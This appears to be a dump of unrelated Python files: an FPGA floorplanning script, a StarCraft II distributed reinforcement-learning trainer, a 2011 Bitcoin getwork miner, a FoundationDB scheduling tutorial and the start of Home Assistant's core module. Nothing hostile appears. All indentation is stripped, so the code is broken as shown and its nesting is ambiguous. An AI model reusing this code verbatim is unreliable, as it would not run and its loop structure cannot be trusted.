T_min = 0.005
coeff = 0.8
print('Simulated Anealing started. Starting with T = '+str(T)+', will be stopped when T < '+str(T_min)+' or 2 consecutive temperature without cost improvement')
old_cost = new_floorplan()
max_inner_iter = 20
nobetter_t_count = 0
while T > T_min:
old_best_cost = best_cost
inner_iter_count = 0
nojump_count = 0
while inner_iter_count < max_inner_iter:
inner_iter_count += 1
s_floorplan.ClearIRL()
tmp_tree = copy.deepcopy( s_floorplan.slicing_tree )
select = random.randint(0,2)
if select == 0:
s_floorplan.M1()
elif select == 1:
s_floorplan.M2()
else:
if not s_floorplan.M3():
s_floorplan.M1()
new_cost = new_floorplan()
ap = accept_prob(old_cost, new_cost, T)
if ap > random.random():
old_cost = new_cost
nojump_count = 0
else:
s_floorplan.slicing_tree = copy.deepcopy( tmp_tree ) #recover the original tree
nojump_count += 1
if nojump_count >= 3:
break
T = T*coeff
print(inner_iter_count,'floorplan evaluated, T =', T)
print('So far, best cost found = '+str(best_cost)+' , best floorplan: '+str(best_fp))
if best_cost == old_best_cost:
nobetter_t_count += 1
else:
nobetter_t_count =0
if nobetter_t_count >= 2 and best_cost != 999:
break
# draw result
if best_cost == 999:
print('No feasible floorplan found')
with open('./output_files/json/final_result','w') as json_file:
json.dump(final_result, json_file)
return
else:
print('best floorplan: '+str(best_fp))
modules = best_fp[1]
final_result = [best_temp_max, modules]
with open('./output_files/json/final_result','w') as json_file:
json.dump(final_result, json_file)
DrawFloorplan('./output_files/'+design_name+'_floorplan_sa.svg',modules)
DrawThermalMap('./output_files/'+design_name+'_thermal_map_sa.svg',modules, 0)
return modules
# check if module1 [x1,y1,w1,h1] overlap with module2 [x2,y2,w2,h2]
def CheckOverlapMod(module1, module2):
x1,y1,w1,h1 = module1
x2,y2,w2,h2 = module2
if x1 < x2+w2 and x1+w1 > x2 and y1 < y2+h2 and y1+h1 > y2:
return True
else:
return False
# check if new_module [x,y,w,h] overlap with modules in floorplan [['name',[x,y,w,h]],[..],..]
def CheckOverlap(floorplan, new_module):
for mod in floorplan:
if CheckOverlapMod(mod[1], new_module):
return True
return False
# floorplan format: [['name',[x,y,w,h]],[..],..]
def BoundingArea(floorplan):
max_x = 0
max_y = 0
for mod in floorplan:
right_x = mod[1][0]+mod[1][2]
upper_y = mod[1][1]+mod[1][3]
if right_x > max_x:
max_x = right_x
if upper_y > max_y:
max_y = upper_y
return max_x*max_y
# Euclidean distance of the centers of two modules, module format:[x,y,w,h]
def EuclideanDist(module1,module2):
center1_x = module1[0] + module1[2]/2
center1_y = module1[1] + module1[3]/2
center2_x = module2[0] + module2[2]/2
center2_y = module2[1] + module2[3]/2
Edist = ((center1_x - center2_x)**2 + (center1_y - center2_y)**2 )**0.5
return Edist
# module format: ['name',[x,y,w,h]]
def PowerDensity(module):
power = module_list[module[0]][1]
area = module[1][2]*module[1][3]
return power/area
# floorplanning algorithm based on (modified) cluster growth
def FloorplaningMCG():
global alpha, final_result
alpha = 1
# Cost function when select module locations, module: [x,y,w,h]
def cost_func(module):
if CheckOverlap(floorplan_mcg, module):
cost = float('inf')
else:
new_floorplan = floorplan_mcg + [['new_module',module]]
bound = BoundingArea(new_floorplan)
b_area_norm = bound/(WIDTH*HEIGHT) #normalized bounding area
power_density = PowerDensity([current_mod_name,module])
mod_area_self = module[2]*module[3]
second_term_sum = 0
for mod in floorplan_mcg:
mod_area = mod[1][2] * mod[1][3]
dist = EuclideanDist(module,mod[1])
other_power_density = PowerDensity(mod)
pd_diff = abs(power_density - other_power_density)
second_term_sum += (mod_area*mod_area_self)**0.5 /(dist * (pd_diff+mcg_const))
cost = mcg_alpha*b_area_norm + mcg_beta*second_term_sum
return cost
# first module to place is given as seed
def LinearOrdering(first_mod_name):
module_order = [first_mod_name]
mod_list = list(module_list)
gain_list = [0]*len(mod_list)
unselected_list = [True]*len(mod_list)
selected_index = mod_list.index(module_order[-1])
unselected_list[selected_index] = False
for i,mod in enumerate(mod_list):
for other_mod in module_list[mod][2]:
gain_list[i] -= module_list[mod][2][other_mod] #new nets
while True in unselected_list:
net_dict = module_list[ module_order[-1] ][2]
for mod in net_dict:
mod_index = mod_list.index(mod)
gain_list[mod_index] += net_dict[mod] #nets going to be terminated
remaining_mods = list( itertools.compress(mod_list,unselected_list) )
remaining_gains = list( itertools.compress(gain_list,unselected_list) )
module_order.append( remaining_mods[ remaining_gains.index( max(remaining_gains) ) ] )
selected_index = mod_list.index(module_order[-1])
unselected_list[selected_index] = False
return module_order
os.system('mkdir -p ./hotspot/mcg')
# generate IRL for leaves (modules), generate leaf_IRL:{'fir':[[x,y,w,h]..],...}
AllLeavesIRLGen()
floorplan_list = []
max_temp_list = []
for module_n in list(module_list):
module_order = LinearOrdering(module_n)
print('order:',module_order)
floorplan_mcg = [] # in formant [['name',[x,y,w,h]],[..],..]
mcg_success = True
for mod_name in module_order:
mod_location_list = leaf_IRL[mod_name]
current_mod_name = mod_name
mod_cost_list = list( map(cost_func,mod_location_list) )
min_cost_ind = mod_cost_list.index( min(mod_cost_list) )
if min_cost_ind != float('inf'):
min_cost_location = mod_location_list[min_cost_ind]
floorplan_mcg.append([mod_name,min_cost_location])
print(mod_name,'placed')
else:
mcg_success = False
break
if mcg_success == True:
print('succeed')
floorplan_list.append(copy.deepcopy(floorplan_mcg))
RunHotSpot(floorplan_mcg, 0, 'mcg')
cur_max_temp = ReadTempMax('mcg')
max_temp_list.append(cur_max_temp)
# draw result
if not mcg_success:
print('No feasible floorplan found')
with open('./output_files/json/final_result','w') as json_file:
json.dump(final_result, json_file)
return
else:
floorplan_mcg = copy.deepcopy( floorplan_list[max_temp_list.index( min(max_temp_list) )] )
print('best floorplan:',floorplan_mcg)
os.system('mkdir -p ./hotspot/mcg')
DrawThermalMap('./output_files/'+design_name+'_thermal_map_mcg.svg',floorplan_mcg, 0)
temp_max = ReadTempMax('')
final_result = [temp_max, floorplan_mcg]
with open('./output_files/json/final_result','w') as json_file:
json.dump(final_result, json_file)
DrawFloorplan('./output_files/'+design_name+'_floorplan_mcg.svg',floorplan_mcg)
return floorplan_mcg
def DrawFloorplan(svg_name, modules):
global colormap
cell_width = 10
cell_spacing = 4
label_spacing = 60
label_spacing_to_floorplan = 30
# draw resource labels
dr = svgwrite.Drawing(svg_name,profile='tiny')
i = 0
for cur_r in list(resource):
if cur_r not in colormap:
colormap[cur_r] = 'svgwrite.rgb('+str(random.randint(128,255))+','+str(random.randint(128,255))+','+str(random.randint(128,255))+',"%")'
dr.add(dr.rect(insert=(i*label_spacing+10, HEIGHT*(cell_width+cell_spacing)+label_spacing_to_floorplan-(resource[cur_r][1]-1)*cell_width),size=(resource[cur_r][0]*cell_width,resource[cur_r][1]*cell_width),stroke='gray',fill=colormap[cur_r]))
dr.add(dr.text(cur_r,insert=(i*label_spacing+15+resource[cur_r][0]*cell_width, HEIGHT*(cell_width+cell_spacing)+label_spacing_to_floorplan+10)))
i = i+1
# draw empty floorplan
dr.add(dr.rect(insert=(0,0),size=(cell_width*WIDTH+cell_spacing*(WIDTH+1),cell_width*HEIGHT+cell_spacing*(HEIGHT+1)),stroke='orange',fill='white'))
for cell in res_cells:
if cell[0] not in resource:
print('Error: unknown resource in resource file')
sys.exit(1)
cwidth = resource[cell[0]][0] #width in number of width of a LAB
cheight = resource[cell[0]][1]
initial_x = cell[1]*cell_width + (cell[1]+1)*cell_spacing #coordinate of top right corner
initial_y = (HEIGHT-cell[2]-cheight)*cell_width + (HEIGHT-cell[2]-cheight+1)*cell_spacing
rwidth = cwidth*cell_width + (cwidth-1)*cell_spacing #width on the graph drawn (in pixel)
rheight = cheight*cell_width + (cheight-1)*cell_spacing
ccolor = colormap[cell[0]]
dr.add(dr.rect(insert=(initial_x,initial_y),size=(rwidth,rheight),stroke='gray',fill=ccolor))
# draw modules
for mod in modules:
mod_name = mod[0]
mx = mod[1][0]
my = mod[1][1]
mw = mod[1][2]
mh = mod[1][3]
initial_x = mx*cell_width +(mx+0.5)*cell_spacing
initial_y = (HEIGHT-my-mh)*cell_width + (HEIGHT-my-mh+0.5)*cell_spacing
rwidth = mw*cell_width + mw*cell_spacing
rheight = mh*cell_width + mh*cell_spacing
dr.add(dr.rect(insert=(initial_x,initial_y),size=(rwidth,rheight),stroke='black',fill='white'))
dr.add(dr.text(mod_name,insert=(initial_x,initial_y+20)))
dr.save()
def DrawThermalMap(file_name,module_loc_list, root_power):
RunHotSpot(module_loc_list, root_power, '')
os.system('cd hotspot && ./grid_thermal_map.pl '+design_name+'.flp '+design_name+'.grid.steady > ../'+file_name)
design_name = 'test' #default
if __name__ == "__main__":
SetGlobalVar(sys.argv[1:])
resource_file = "./"+ design_name +".res"
module_file = "./"+ design_name +".module"
exec(open(resource_file).read())
exec(open(module_file).read())
sema_hotspot = threading.Semaphore(value = PROCESS_MAX )
sema_irlgen = multiprocessing.Semaphore(PROCESS_MAX)
if __name__ == "__main__":
main()
|
clone_five_eval_mini_srcgame_add_map_bn.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "4,5"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_add_map_bn as mini_source_agent
from mini_network_add_map_bn import MiniNetwork
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
# 20200825-101942_mini
# 20200828-160609_source
flags.DEFINE_string("restore_model_path", "./model/20200901-213813_mini/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_string("restore_from", "mini", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 12770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_bool("partial_restore", True, "Whether use partial_restore, default is True.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type: Add, AddWeight, AdaptiveWeight, AttentionWeight, default is AddWeight")
flags.DEFINE_string("initial_type", "original", "weight initial type: original, normal, xavier, he, zero, default is original")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 1
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
if USED_DEVICES == '-1':
DEVICE = ['/cpu:0']
else:
DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_right_add(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore,
weighted_sum_type=FLAGS.weighted_sum_type, initial_type=FLAGS.initial_type)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
use_sep_net=FLAGS.use_sep_net,
restore_model=FLAGS.restore_model,
restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore,
weighted_sum_type=FLAGS.weighted_sum_type, initial_type=FLAGS.initial_type)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
latest_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
latest_win_rate = win_rate
agent.net.save_latest_policy()
return max_win_rate, latest_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Best Win_rate:', max_win_rate)
print('Latest Win_rate:', latest_win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 36894
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
SchedulingTutorial.py | import itertools
import traceback
import fdb
import fdb.tuple
fdb.api_version(520)
####################################
## Initialization ##
####################################
# Data model:
# ('attends', student, class) = ''
# ('class', class_name) = seats_left
db = fdb.open()
scheduling = fdb.directory.create_or_open(db, ('scheduling',))
course = scheduling['class']
attends = scheduling['attends']
@fdb.transactional
def add_class(tr, c):
tr[course.pack((c,))] = fdb.tuple.pack((100,))
# Generate 1,620 classes like '9:00 chem for dummies'
levels = ['intro', 'for dummies', 'remedial', '101',
'201', '301', 'mastery', 'lab', 'seminar']
types = ['chem', 'bio', 'cs', 'geometry', 'calc',
'alg', 'film', 'music', 'art', 'dance']
times = [str(h) + ':00' for h in range(2, 20)]
class_combos = itertools.product(times, types, levels)
class_names = [' '.join(tup) for tup in class_combos]
@fdb.transactional
def init(tr):
del tr[scheduling.range(())] # Clear the directory
for class_name in class_names:
add_class(tr, class_name)
####################################
## Class Scheduling Functions ##
####################################
@fdb.transactional
def available_classes(tr):
return [course.unpack(k)[0] for k, v in tr[course.range(())]
if fdb.tuple.unpack(v)[0]]
@fdb.transactional
def signup(tr, s, c):
rec = attends.pack((s, c))
if tr[rec].present(): return # already signed up
seats_left = fdb.tuple.unpack(tr[course.pack((c,))])[0]
if not seats_left: raise Exception('No remaining seats')
classes = tr[attends.range((s,))]
if len(list(classes)) == 5: raise Exception('Too many classes')
tr[course.pack((c,))] = fdb.tuple.pack((seats_left - 1,))
tr[rec] = b''
@fdb.transactional
def drop(tr, s, c):
rec = attends.pack((s, c))
if not tr[rec].present(): return # not taking this class
tr[course.pack((c,))] = fdb.tuple.pack((fdb.tuple.unpack(tr[course.pack((c,))])[0] + 1,))
del tr[rec]
@fdb.transactional
def switch(tr, s, old_c, new_c):
drop(tr, s, old_c)
signup(tr, s, new_c)
####################################
## Testing ##
####################################
import random
import threading
def indecisive_student(i, ops):
student_ID = 's{:d}'.format(i)
all_classes = class_names
my_classes = []
for i in range(ops):
class_count = len(my_classes)
moods = []
if class_count: moods.extend(['drop', 'switch'])
if class_count < 5: moods.append('add')
mood = random.choice(moods)
try:
if not all_classes:
all_classes = available_classes(db)
if mood == 'add':
c = random.choice(all_classes)
signup(db, student_ID, c)
my_classes.append(c)
elif mood == 'drop':
c = random.choice(my_classes)
drop(db, student_ID, c)
my_classes.remove(c)
elif mood == 'switch':
old_c = random.choice(my_classes)
new_c = random.choice(all_classes)
switch(db, student_ID, old_c, new_c)
my_classes.remove(old_c)
my_classes.append(new_c)
except Exception as e:
traceback.print_exc()
print("Need to recheck available classes.")
all_classes = []
def run(students, ops_per_student):
threads = [
threading.Thread(target=indecisive_student, args=(i, ops_per_student))
for i in range(students)]
for thr in threads: thr.start()
for thr in threads: thr.join()
print("Ran {} transactions".format(students * ops_per_student))
if __name__ == "__main__":
init(db)
print("initialized")
run(10, 10)
|
core.py | """
Core components of Home Assistant.
Home Assistant is a Home Automation framework for observing the state
of entities and react to changes.
"""
# pylint: disable=unused-import, too-many-lines
import asyncio
from concurrent.futures import ThreadPoolExecutor
import enum
import functools as ft
import logging
import os
import re
import signal
import sys
import threading
import time
from types import MappingProxyType
from typing import Optional, Any, Callable, List # NOQA
import voluptuous as vol
from voluptuous.humanize import humanize_error
